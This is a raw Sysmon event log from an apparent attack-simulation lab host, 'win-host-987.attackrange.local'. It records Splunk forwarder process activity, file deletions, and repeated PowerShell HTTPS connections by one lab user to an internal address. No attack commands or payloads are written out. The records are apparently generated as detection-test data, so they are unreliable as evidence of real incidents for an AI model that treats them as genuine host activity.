13:16:08.624{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-A098-6140-7956-04000000C801}5064C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036497198Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:08.623{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A098-6140-7956-04000000C801}5064C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036497197Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:08.608{B81B27B7-A098-6140-7956-04000000C801}5064C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000036497196Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:08.076{B81B27B7-A097-6140-7856-04000000C801}69324544C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000036497208Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:09.790{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=752154B71FFB5442389A51644703B731,SHA256=80E3FACB5B9B4DD3DE90E00F1D81E0C561DA02B91ADC046BE75320AF0B4E6CBE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497210Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:10.822{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AEDDB0EF44C50569DDA1E0238635B6A0,SHA256=0BCA40B1002FBC3C00BE36B90D6E18CFBBAB3BADB0812BDF157ABB0A5253A7E0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497209Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:10.190{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=59C1BED36047435A0A8F480A48BD4116,SHA256=C0AFD511D7F3CDFC0D34291B65925C89B026C48801B9830ACADE26123914ED22,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497212Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:11.857{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F1803B9A1D65F86095FCC64CE827CB6,SHA256=D77092D34EF283ADFF67E9A1542D1744A97B56F8DEB88116DDBB961BCA54D111,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497211Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:40.858{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50505-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497214Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:12.872{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E02F8B0B4B8A2237328BC44F186AAC68,SHA256=950F6619B75E8EA25B85CB56F0C83E4A4CCD255232FEE0CC959C01F991A085B7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497213Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:41.804{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50506-false10.0.1.12-8000- 23542300x800000000000000036497215Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:13.902{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4FD5D6117D6EDC176B8CE1BDE0FCEF41,SHA256=C81DBFE0D4F8B5B82CDC66862BEB726BA4AC1E1D168C6D0557F88B4A21707D53,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497216Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:14.920{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=67B4D00901DE60815ADFC269D82186B1,SHA256=89F7668D1D6E3E2D169A9E7004B7570D3798D74D401B0D281E9471DBC10AFC63,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497217Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:15.968{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A937A036250DC6A101C2A8CD21E315CC,SHA256=06759D387ABE05DD81AB6345C1F67B683ACC1B617B55ECC4824F81663BF984A5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497219Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:16.985{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F25AA1F8F2EDAD3475F3B34908EC685A,SHA256=8186AF16D37CDFA99E129D6E3E52D781D8A9EA597B873CEA04921B6E4955306A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497218Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:16.420{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=89032AE408A24A98E2A4E8068BA511CD,SHA256=0D786484F3C58E8FA9BA288B9F8A6C949FA621A6BD3A9FA6FA540BD4BD3DD34C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497220Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:46.868{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50507-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000036497222Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:47.835{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50508-false10.0.1.12-8000- 23542300x800000000000000036497221Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:18.037{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=269C74ADD03BD2455E65EB1BB5EE2AD5,SHA256=59F293152B00628A3EBA180ADEF924CBF9AE1365E9776234E941B4763D0F551D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497223Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:19.098{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=397B54DBE35B1C7E03AE4DF13CA908BA,SHA256=9AEBA52BBDD25C8636A4D609438BC9451C2EF05C054F3B19A1032B128A3B42AF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497224Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:20.114{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C2D58BEF4D87D9E6D62FA56694B6131C,SHA256=6C611EE76800337777FCC574B96D5CD7434AF1F00357A759FC496C2F958CE3DB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497226Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:21.380{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=DFD239FE20A02054EB3530EA8A8B0A3F,SHA256=A91333650691943AAAE61803C30D59CBC3CE85FD9948365EAAFA326AD816FDA4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497225Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:21.133{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B4CA3DC0FDADCEFD8E5D9F9A39315E2,SHA256=D31ED0739063A5732B689467DB406084D8D9BF962333185781F4943D4DFF212E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497228Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:51.882{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50509-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497227Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:22.163{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8FE6647CED24639F47D843DE54338740,SHA256=AB4DF798559E964919A934C7E323F6783F2EE064F7230BB82C4A077A3CD9CAAF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497230Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:23.231{B81B27B7-4012-611D-1100-00000000C801}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=B33438B21CF44385E1D7E83677098A4B,SHA256=9EC74F6A948A5BB8158C536C5B78BA14038DB3D283B69D5EE23EFF0292851091,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497229Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:23.214{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84393118558F71C6FDE5384ABD3CC113,SHA256=A52939F463DDFFFA6F71DDB9CF23B19407DF8DD6809D2BC264CAE86EACAA752B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036497249Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:24.893{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A0A8-6140-7B56-04000000C801}2348C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497248Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:24.893{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497247Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:24.893{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497246Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:24.893{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497245Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:24.893{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497244Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:24.893{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-A0A8-6140-7B56-04000000C801}2348C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036497243Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:24.893{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A0A8-6140-7B56-04000000C801}2348C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036497242Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:24.878{B81B27B7-A0A8-6140-7B56-04000000C801}2348C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000036497241Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:24.361{B81B27B7-A0A8-6140-7A56-04000000C801}71127096C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000036497240Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:53.830{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50510-false10.0.1.12-8000- 23542300x800000000000000036497239Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:24.231{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B2B8A2716E3E46377AFE3F7980FAAEF6,SHA256=21A373BAE9418EEA907113D3570A4A64F194F8DF0BECABBB533163A8C6A8DF71,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036497238Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:24.193{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A0A8-6140-7A56-04000000C801}7112C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497237Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:24.193{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497236Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 